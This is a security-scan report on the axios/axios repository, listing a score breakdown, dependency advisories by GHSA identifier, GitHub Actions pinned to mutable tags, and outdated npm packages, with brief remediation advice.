28 of your 191 findings came from Repobility's proprietary detections. ✓ Repobility tags below mark them.

Scan timing: clone 2.33s · analysis 20.97s · 2.7 MB · GitHub API rate-limit (preflight)

axios/axios

https://github.com/axios/axios · scanned 2026-06-05 04:17 UTC (3 hours, 32 minutes ago) · 10 languages

351 findings (191 legacy + 160 scanner) · 60th percentile · JavaScript · small (2-20K LoC) · Scanner says 80 (lower by 2)


Complete repo analysis

Last scanned 3 hours, 32 minutes ago · v2 · 271 findings from 2 sources. Findings combine the legacy security pipeline AND the multi-layer engine (atlas, wiring, flows, ranked) AND verified AI agent contributions.

Score breakdown · 2026-05-18-v5

Component             Sub-score   Weight   Contribution
structure_score           100.0     0.15          15.00
security_score             52.3     0.25          13.07
testing_score              90.0     0.20          18.00
documentation_score        87.6     0.15          13.14
practices_score            73.0     0.15          10.95
code_quality               76.1     0.10           7.61
Overall                              1.00          77.8
Scan summary: Repository scanned at 80.0/100 with 77.8% coverage. It contains 1066 nodes across 2 cross-layer flows, written primarily in mixed languages. Engine surfaced 80 findings, concentrated in software (50), frontend (16), quality (8). Risk profile is low: 0 critical, 0 high, 3 medium. Recommended next step: open the software layer findings first; that's where the highest-impact wins live.

Showing 242 of 271 findings.

critical Legacy software dependency conf 0.88 babel-traverse: GHSA-67hx-6x53-jw92
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 basic-ftp: GHSA-5rq4-664w-9x2c
Basic FTP has Path Traversal Vulnerability in its downloadToDir() method
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 cipher-base: GHSA-cpq7-6gpm-g9rc
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 elliptic: GHSA-vjh7-7g9h-fjfh
Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string)
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 form-data: GHSA-fjxv-7rqg-78g4
form-data uses unsafe random function in form-data for choosing boundary
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 handlebars: GHSA-2w6w-674q-4c4q
Handlebars.js has JavaScript Injection via AST Type Confusion
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 pbkdf2: GHSA-h7cp-r72f-jxh6
pbkdf2 returns predictable uninitialized/zero-filled memory for non-normalized or unimplemented algos
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 pbkdf2: GHSA-v62p-rq8g-8h59
pbkdf2 silently disregards Uint8Array input, returning static keys
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 sha.js: GHSA-95m3-7q98-8xr5
sha.js is missing type checks leading to hash rewind and passing on crafted data
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-248r-7h7q-cr24
vm2 Has a Sandbox Breakout Using Async Generator
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-47x8-96vw-5wg6
vm2 Access to Host Object Enables Sandbox Escape
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-55hx-c926-fr95
VM2 Has a Sandbox Escape Issue via SuppressedError
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-6j2x-vhqr-qr7q
vm2 sandbox escape via JSPI-backed Promise `.finally()` species bypass
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-76w7-j9cq-rx2j
vm2 is Vulnerable to Sandbox Breakout Through Promise Species
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-8hg8-63c5-gwmx
vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-99p7-6v5w-7xg8
vm2 has a Sandbox Escape
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-9qj6-qjgg-37qq
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-9vg3-4rfj-wgcm
vm2 has Sandbox Breakout Through Null Proto Exception
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-cchq-frgv-rjh5
vm2 Sandbox Escape vulnerability
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-g644-9gfx-q4q4
vm2 Sandbox Escape vulnerability
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-grj5-jjm8-h35p
VM2 Sandbox Breakout Through __lookupGetter__
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-qcp4-v2jj-fjx8
vm2 has a Sandbox Escape Vulnerability
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-qvjj-29qf-hp7p
VM2 Has Sandbox Breakout Through Promise Species
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-rp36-8xq3-r6c4
NodeVM builtin denylist bypass via process and inspector/promises allows host code execution
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-v37h-5mfm-c47c
VM2 Has Sandbox Breakout Through Inspect Function
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-v6mx-mf47-r5wg
vm2 has a Sandbox Escape issue
package-lock.json · dependency · legacy
critical Legacy software dependency conf 0.88 vm2: GHSA-vwrp-x96c-mhwq
vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input
package-lock.json · dependency · legacy
low Legacy software xss conf 1.00 [SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflected XSS vector. The browser parses the HTML and executes any <script> or event-handler attributes in the data. CWE-79. Especially dangerous when the data comes from a CV parser, profile field, or any user-input pipeline.
For plain text: use el.textContent = data.value (auto-escapes). For HTML you need to render: el.innerHTML = DOMPurify.sanitize(html). For React/Vue/Svelte: stop using innerHTML; use the framework's binding. When data comes from CV/PDF parsers, sanitize at the parser boundary too.
gulpfile.js:62 · xss · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/publish.yml:18 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:20 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:31 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:30 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/dependency-review-action` pinned to mutable ref `@v4`
`uses: actions/dependency-review-action@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:51 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/publish.yml:20 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:28 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:35 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:32 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `github/codeql-action/analyze` pinned to mutable ref `@v4`
`uses: github/codeql-action/analyze@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:60 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `github/codeql-action/init` pinned to mutable ref `@v4`
`uses: github/codeql-action/init@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:54 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `peter-evans/create-pull-request` pinned to mutable ref `@v7`
`uses: peter-evans/create-pull-request@v7` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:49 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `peter-evans/create-pull-request` pinned to mutable ref `@v7`
`uses: peter-evans/create-pull-request@v7` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:59 · dependency · legacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `phips28/gh-action-bump-version` pinned to mutable ref `@v9`
`uses: phips28/gh-action-bump-version@v9` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:40 · dependency · legacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 braces: GHSA-grv7-fg5c-xmjg
Uncontrolled resource consumption in braces
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 browserify-sign: GHSA-x9w5-v3q2-3rhw
browserify-sign upper bound check issue in `dsaVerify` leads to a signature forgery attack
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 cross-spawn: GHSA-3xgq-45jj-v275
Regular Expression Denial of Service (ReDoS) in cross-spawn
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 dicer: GHSA-wm7h-9275-46v2
Crash in HeaderParser in dicer
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 glob: GHSA-5j98-mcp5-4vw2
glob CLI: Command injection via -c/--cmd executes matches with shell:true
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 handlebars: GHSA-3mfm-83xf-c92r
Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 handlebars: GHSA-9cx6-37pm-9jff
Handlebars.js has Denial of Service via Malformed Decorator Syntax in Template Compilation
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 handlebars: GHSA-xhpv-hc6g-r9c6
Handlebars.js has JavaScript Injection via AST Type Confusion when passing an object as dynamic partial
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 handlebars: GHSA-xjpj-3mr7-gcpf
Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 http-cache-semantics: GHSA-rc47-6667-2j5j
http-cache-semantics vulnerable to Regular Expression Denial of Service
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 ip: GHSA-2p57-rm9w-gvfp
ip SSRF improper categorization in isPublic
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 lodash: GHSA-r5fr-rjxr-66jc
lodash vulnerable to Code Injection via `_.template` imports key names
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-44fp-w29j-9vj5
Multer vulnerable to Denial of Service via memory leaks from unclosed streams
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-4pg4-qvpc-4q3h
Multer vulnerable to Denial of Service from maliciously crafted requests
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-5528-5vmv-3xc2
Multer Vulnerable to Denial of Service via Uncontrolled Recursion
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-fjgf-rc76-4x9p
Multer vulnerable to Denial of Service via unhandled exception from malformed request
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-g5hg-p3ph-g8qg
Multer vulnerable to Denial of Service via unhandled exception
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-v52c-386h-88mc
Multer vulnerable to Denial of Service via resource exhaustion
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 multer: GHSA-xf7r-hgr6-v32p
Multer vulnerable to Denial of Service via incomplete cleanup
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 node-forge: GHSA-2328-f5f3-gj25
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 node-forge: GHSA-5m6q-g25r-mvwx
Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 node-forge: GHSA-ppp5-5v6c-4jwp
Forge has signature forgery in RSA-PKCS due to ASN.1 extra field
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 node-forge: GHSA-q67f-28xg-22rw
Forge has signature forgery in Ed25519 due to missing S > L check
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-9wv6-86v2-598j
path-to-regexp outputs backtracking regular expressions
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-rhx6-c78j-4q9w
path-to-regexp contains a ReDoS
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 rollup: GHSA-gcx4-mw62-g8wm
DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 rollup: GHSA-mw96-cpmx-2vgc
Rollup 4 has Arbitrary File Write via Path Traversal
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 semver-regex: GHSA-44c6-4v22-4mhx
semver-regex Regular Expression Denial of Service (ReDOS)
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 semver: GHSA-c2qf-rxjj-qqgw
semver vulnerable to Regular Expression Denial of Service
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 socket.io-parser: GHSA-677m-j7p3-52f9
socket.io allows an unbounded number of binary attachments
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-34x7-hfp2-rc4v
node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-3jfq-g458-7qm9
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-5955-9wpr-37jh
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-83g3-92jg-28cx
Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-8qq5-rm4j-mr97
node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-9ppj-qmqm-q256
node-tar Symlink Path Traversal via Drive-Relative Linkpath
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-qffp-2rhf-9h96
tar has Hardlink Path Traversal via Drive-Relative Linkpath
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tar: GHSA-r6q2-hw4h-h46w
Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 vm2: GHSA-6785-pvv7-mvg7
vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 vm2: GHSA-c4cf-2hgv-2qv6
vm2's Bridge Proxy set trap ignores receiver parameter, enabling host object property injection via prototype chain
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 vm2: GHSA-hw58-p9xv-2mjh
vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 vm2: GHSA-m5q2-4fm3-vfqp
vm2 has a sandbox escape via unblocked cross-realm Symbol.for keys + missing bridge write-trap symbol checks
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 vm2: GHSA-r9pm-gxmw-wv6p
NodeVM network builtin exclusions bypass via internal _http_client and _http_server
package-lock.json · dependency · legacy
high Legacy software dependency conf 0.88 ws: GHSA-3h5v-q93c-6h6q
ws affected by a DoS when handling a request with many HTTP headers
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 @babel/helpers: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 @babel/runtime: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 @octokit/plugin-paginate-rest: GHSA-h5c3-5r3r-rr8q
@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 @octokit/request-error: GHSA-xx4v-prfh-6cgc
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 @octokit/request: GHSA-rmvr-2pp2-xj38
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json · dependency · legacy
medium Legacy security auth conf 0.92 [AUC001] No Repobility access matrix policy found
The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
auth · legacy
medium Legacy software dependency conf 0.88 ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 ajv: GHSA-v88g-cgmw-v5xw
Prototype Pollution in Ajv
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 bn.js: GHSA-378v-28hj-76wf
bn.js affected by an infinite loop
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 got: GHSA-pfrx-2q88-qq97
Got allows a redirect to a UNIX socket
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 handlebars: GHSA-2qvq-rjwj-gvw9
Handlebars.js has Prototype Pollution Leading to XSS through Partial Template Injection
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 handlebars: GHSA-7rx3-28cr-v5wh
Handlebars.js has a Prototype Method Access Control Gap via Missing __lookupSetter__ Blocklist Entry
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 lodash: GHSA-f23m-r3pf-42rh
lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 lodash: GHSA-xxjr-mmjv-4gpg
Lodash has Prototype Pollution Vulnerability in `_.unset` and `_.omit` functions
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.88 micromatch: GHSA-952p-6rrq-rcjv
Regular Expression Denial of Service (ReDoS) in micromatch
package-lock.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@commitlint/cli` is 4 major version(s) behind (17.8.1 -> 21.0.2)
`@commitlint/cli` is pinned/resolved at 17.8.1 but the latest stable release on the npm registry is 21.0.2 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@commitlint/config-conventional` is 4 major version(s) behind (17.8.1 -> 21.0.2)
`@commitlint/config-conventional` is pinned/resolved at 17.8.1 but the latest stable release on the npm registry is 21.0.2 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-up…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@release-it/conventional-changelog` is 6 major version(s) behind (5.1.1 -> 11.0.1)
`@release-it/conventional-changelog` is pinned/resolved at 5.1.1 but the latest stable release on the npm registry is 11.0.1 (6 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-alias` is 1 major version(s) behind (5.1.0 -> 6.0.0)
`@rollup/plugin-alias` is pinned/resolved at 5.1.0 but the latest stable release on the npm registry is 6.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-babel` is 2 major version(s) behind (5.3.1 -> 7.1.0)
`@rollup/plugin-babel` is pinned/resolved at 5.3.1 but the latest stable release on the npm registry is 7.1.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-commonjs` is 14 major version(s) behind (15.1.0 -> 29.0.3)
`@rollup/plugin-commonjs` is pinned/resolved at 15.1.0 but the latest stable release on the npm registry is 29.0.3 (14 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PR…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-json` is 2 major version(s) behind (4.1.0 -> 6.1.0)
`@rollup/plugin-json` is pinned/resolved at 4.1.0 but the latest stable release on the npm registry is 6.1.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-multi-entry` is 3 major version(s) behind (4.1.0 -> 7.1.0)
`@rollup/plugin-multi-entry` is pinned/resolved at 4.1.0 but the latest stable release on the npm registry is 7.1.0 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PR…
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-node-resolve` is 7 major version(s) behind (9.0.0 -> 16.0.3)
`@rollup/plugin-node-resolve` is pinned/resolved at 9.0.0 but the latest stable release on the npm registry is 16.0.3 (7 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update …
package.json · dependency · legacy
medium Legacy software dependency conf 0.90 npm package `body-parser` is 1 major version(s) behind (1.20.3 -> 2.2.2)
`body-parser` is pinned/resolved at 1.20.3 but the latest stable release on the npm registry is 2.2.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `c8` is 1 major version(s) behind (10.1.3 -> 11.0.0)
`c8` is pinned/resolved at 10.1.3 but the latest stable release on the npm registry is 11.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `chalk` is 3 major version(s) behind (2.4.2 -> 5.6.2)
`chalk` is pinned/resolved at 2.4.2 but the latest stable release on the npm registry is 5.6.2 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `cross-env` is 3 major version(s) behind (7.0.3 -> 10.1.0)
`cross-env` is pinned/resolved at 7.0.3 but the latest stable release on the npm registry is 10.1.0 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `express` is 1 major version(s) behind (4.21.1 -> 5.2.1)
`express` is pinned/resolved at 4.21.1 but the latest stable release on the npm registry is 5.2.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `formdata-node` is 1 major version(s) behind (5.0.1 -> 6.0.3)
`formdata-node` is pinned/resolved at 5.0.1 but the latest stable release on the npm registry is 6.0.3 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
